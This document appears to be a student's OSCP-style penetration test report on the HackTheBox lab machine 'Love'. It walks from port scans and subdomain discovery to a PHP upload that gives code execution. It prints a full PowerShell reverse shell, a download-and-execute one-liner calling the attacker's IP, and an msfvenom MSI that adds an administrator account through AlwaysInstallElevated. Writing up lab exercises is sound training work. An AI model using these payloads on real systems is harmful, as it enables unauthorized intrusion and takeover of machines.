EN

1 - Love

/jorge-testa-ciberseguridad [email protected] https://jorgetesta.tech

Penetration Test Report

Love
A machine of: HackTheBox
2 - Love

$>_NO SYSTEM LASTS FOREVER.

 3 - Love

TABLE OF CONTENTS

1 Pentesting report
1.1 Introduction��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������4

1.2 Objective��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������4

1.3 Requirements���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������4

2 High Level Summary

2.1 Recommendations���������������������������������������������������������������������������������������������������������������������������������������������������������������������5

3 Methodology
3.1 Collection of information��������������������������������������������������������������������������������������������������������������������������������������������������������6

4 Penetration
4.1 List of Services��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������6

4.2 Pre-exploitation����������������������������������������������������������������������������������������������������������������������������������������������������������������������������8

4.3 Post Exploitation����������������������������������������������������������������������������������������������������������������������������������������������������������������������� 17

4.4 Additional Assets���������������������������������������������������������������������������������������������������������������������������������������������������������������������� 19

5 Cleaning the Traces

 4 - Love

1 Pentesting report

1.1 Introduction
This report contains all the efforts that went into completing the HackTheBox Love machine

This report will be scored from a point of view of correctness and completeness in all aspects of the
exam.

The objective of this report is to ensure that the student, in this case, Jorge Testa, has a complete unders-
tanding of the methodologies of a pentesting exercise as well as to demonstrate that he also possesses
the technical knowledge necessary to successfully complete the OSCP certification using this report as a
model to document the machines that it violates in the different laboratories.

1.2 Objective
The objective of this installment is to perform an internal penetration test against the Love machine
from the HackTheBox network.

The student is tasked with following a methodical approach to gain access to the set goals.

This test should simulate a real penetration test and how you would start from start to finish, including
the general report.

1.3 Requirements
The student must complete this penetration test report in its entirety and include the following sections:

• Summary and general high-level recommendations (non-technical)

• Tutorial of the methodology and detailed outline of the steps carried out
• Each find with screenshots, guides, sample code and corresponding flags
• Any additional items that are not included.
 5 - Love

2 High Level Summary

Jorge Testa has carried out the task of conducting an internal penetration test on the target machine.
An internal penetration test is a simulated attack against internally connected systems.

The objective of this test is to carry out attacks, similar to those of a malicious entity, and to try to infiltra-
te the internal laboratory systems of the target machine: HackTheBox.

Jorge Testa’s overall goal was to assess the network, identify systems, and exploit failures while doing
this report.

When conducting the internal penetration test, there were several alarming vulnerabilities that were
identified within the network. Jorge has had administrative level access to multiple systems.

The system was successfully exploited.

• 10.129.48.103 (Love):
Plain text credentials in the test platform and remote code execution via php - File upload without res-
trictions and privilege escalation thanks to a bad configuration in the AlwaysInstallElevated directive

2.1 Recommendations
It is recommended to patch the vulnerabilities identified during the penetration test to ensure that a
real attacker will not be able to exploit such systems in the future. One of the important things to re-
member is that these systems need patches and updates, and once patched, they should remain under
the cover of a patching program to mitigate additional vulnerabilities that could be discovered at a later
date than this penetration test.

However, concrete solutions to those specific vulnerabilities are included in later sections.

3 Methodology
Jorge Testa has used a widely adopted approach to penetration testing that is effective in testing how
well the environment of the HackTheBox machine is protected.

Below is a breakdown of how the system could be identified and exploited and includes all individual
vulnerabilities found
 6 - Love

3.1 Collection of information

The information gathering portion of a penetration test focuses on identifying the penetration test ran-
ge. During said test, Jorge was tasked with exploiting the test machine.

This report is made based on the exercise called Love, which in turn has a machine under the same
name Knife belonging to the HackTheBox platform.

Difficulty: Easy

URL: https://app.hackthebox.eu/machines/344

4 Penetration
The steps that have been carried out on the machine are described in detail below when operating the
system and captures and / or codes as well as proofs of concept (PoC) will be attached.

4.1 List of Services

The service enumeration of a penetration test focuses on gathering information from the services that
are active on the target system.

This information is of great strategic value for an attacker as it provides detailed information on potential
attack vectors on that target.

Understanding and knowing what applications and services are running on the system provides vital
information to an attacker before running the penetration test.

It is possible that in some cases some ports are not listed.

IP Ports Srvc/Banner Version

10.129.48.103 TCP: 80 http Apache httpd 2.4.46 ((Win64)
OpenSSL/1.1.1j PHP/7.3.27)
10.129.48.103 TCP: 135 msrpc Microsoft Windows RPC
10.129.48.103 TCP: 139 smb Microsoft Windows netbios-ssn
 7 - Love

IP Ports Srvc/Banner Version

10.129.48.103 TCP: 443 https Apache httpd 2.4.46 (OpenSSL/1.1.1j
PHP/7.3.27)
10.129.48.103 TCP: 445 smb Windows 10 Pro 19042 microsoft-ds
(workgroup: WORKGROUP)
10.129.48.103 TCP: 3306 mysql -
10.129.48.103 TCP: 5000 http Apache httpd 2.4.46 (OpenSSL/1.1.1j
PHP/7.3.27)
10.129.48.103 TCP: 5040 unknown -
10.129.48.103 TCP: 5985 winrm Microsoft HTTPAPI httpd 2.0 (SSDP/
UPnP)
10.129.48.103 TCP: 5986 winrm Microsoft HTTPAPI httpd 2.0 (SSDP/
UPnP)
10.129.48.103 TCP: 7680 pando-pub -
10.129.48.103 TCP: 49664 msrpc Microsoft Windows RPC
10.129.48.103 TCP: 49665 msrpc Microsoft Windows RPC
10.129.48.103 TCP: 49666 msrpc Microsoft Windows RPC
10.129.48.103 TCP: 49667 msrpc Microsoft Windows RPC
 8 - Love

4.2 Pre-exploitation
Exploited Vulnerability:

Plain text credentials in the test platform and remote code execution via php - File upload without res-
trictions

Vulnerable System:

10.129.48.103

Explanation of the Vulnerability:

After obtaining the platform administrator’s credentials by accessing them thanks to the malicious
use of the test platform found in the “staging” subdomain that the developers did not remove after the
release of the application version, it was discovered that The platform allows unrestricted file uploading
and file execution by uploading malicious php files from the control panel due to misconfiguration of
directory permissions and file uploads.

Privilege escalation vulnerability:

The vulnerability allows remote code execution that allows downloading and executing a payload that
will give us access to a reverse shell with the user name “Phoebe”

Vulnerability Solution:

Eliminate all traces and access to the test platforms, as well as a correct configuration of the permissions
and accesses of the directories and implement a correct file upload restriction

Severity:

Critical
 9 - Love

Nmap report of all ports:

└─$ znmap 10.129.48.103

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Issuer: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-01-18T14:00:16
| Not valid after: 2022-01-18T14:00:16
| MD5: bff0 1add 5048 afc8 b3cf 7140 6e68 5ff6
|_SHA-1: 83ed 29c4 70f6 4036 a6f4 2d4d 4cf6 18a2 e9e4 96c2
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| NULL:
|_ Host ‘10.10.14.139’ is not allowed to connect to this MariaDB server
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Issuer: commonName=LOVE
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-11T14:39:19
| Not valid after: 2024-04-10T14:39:19
| MD5: d35a 2ba6 8ef4 7568 f99d d6f4 aaa2 03b5
|_SHA-1: 84ef d922 a70a 6d9d 82b8 5bb3 d04f 066b 12f8 6e73
|_ssl-date: 2021-10-02T12:50:07+00:00; +21m50s from scanner time.
| tls-alpn:
|_  http/1.1
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
 10 - Love

Nikto Report:

└─$ nikto -h http://love.htb

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.129.48.103
+ Target Hostname: love.htb
+ Target Port: 80
+ Start Time: 2021-10-02 09:25:30 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
+ Retrieved x-powered-by header: PHP/7.3.27
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to pro-
tect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the con-
tent of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unk-
nown scanner.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /Admin/: This might be interesting...
 11 - Love

Fuff Report:

└─$ ffuf -w /usr/share/wordlists/onelistforallshort.txt -u http://love.htb -H “Host:FUZZ.love.htb” -fw 65

4 130 ⨯

/’___\ /’___\ /’___\

/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v1.3.1 Kali Exclusive <3

________________________________________________

:: Method : GET
:: URL : http://love.htb
:: Wordlist : FUZZ: /usr/share/wordlists/onelistforallshort.txt
:: Header : Host: FUZZ.love.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response words: 654
________________________________________________

staging [Status: 200, Size: 5357, Words: 1543, Lines: 192]

[WARN] Caught keyboard interrupt (Ctrl-C)
 12 - Love

Access to Administrator credentials:

 13 - Love

Access to the application control panel:

Upload the PHP file for the RCE:

 14 - Love

RCE demo:

Payload content:

# Nishang - Invoke-PowerShellTcpOneLine.ps1
└─$ cat shell.ps1
$client = New-Object System.Net.Sockets.TCPClient(“10.10.14.139”,9999);$stream = $client.GetS-
tream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data
= (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 |
Out-String );$sendback2 = $sendback + “PS “ + (pwd).Path + “> “;$sendbyte = ([text.encoding]::ASCII).
GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 15 - Love

Execute and download command:

powershell “IEX (New-Object Net.WebClient) .downloadString (‘http://10.10.14.139:8000/shell.ps1’)”

Getting the shell with a listener:

 16 - Love

Flag screenshot test:

 17 - Love

4.3 Post Exploitation

Privilege escalation vulnerability:

Bad configuration in AlwaysInstallElevated parameter

Vulnerable System:

10.129.48.103

Explanation of the Vulnerability:

The AlwaysInstallElevated directive allows you to install any windows package in privileged .MSI format.
When creating the payload with msfvenom that contains the necessary commands to create a user, we
can use the winrm service to log in with that user who will have administrator privileges.

Vulnerability Solution:

Disable the AlwaysInstallElevated directive

Severity:

Critical

Registry query:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
 18 - Love

Creating the exploit with msfvenom:

└─$ msfvenom -p windows/adduser USER=r00ted PASS=P@ssword123! -f msi -o r00ted.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 274 bytes
Final size of msi file: 159744 bytes
Saved as: r00ted.msi

Download the exploit:

Invoke-WebRequest “http://10.10.14.139:8000/r00ted.msi” -OutFile “C:\Users\Phoebe\Desktop\r00ted.msi”

Installation of the package with the payload:

msiexec / quiet / qn / i r00ted.msi

Access with evil-winrm:

evil-winrm -u r00ted -p P@ssword123! -i 10.129.48.103

Flag screenshot test:

 19 - Love

4.4 Additional Assets

No additional assets were found.

5 Cleaning the Traces

This last action ensures that the penetration test remains are completely removed.

Often times, snippets of tools or user accounts are left on the system of an organization that has just
passed a penetration test.

These ‘leftovers’ can cause security problems down the road.

Ensuring that we are meticulous and do not leave traces of our and / or tests from our penetration test is
a task of the utmost importance.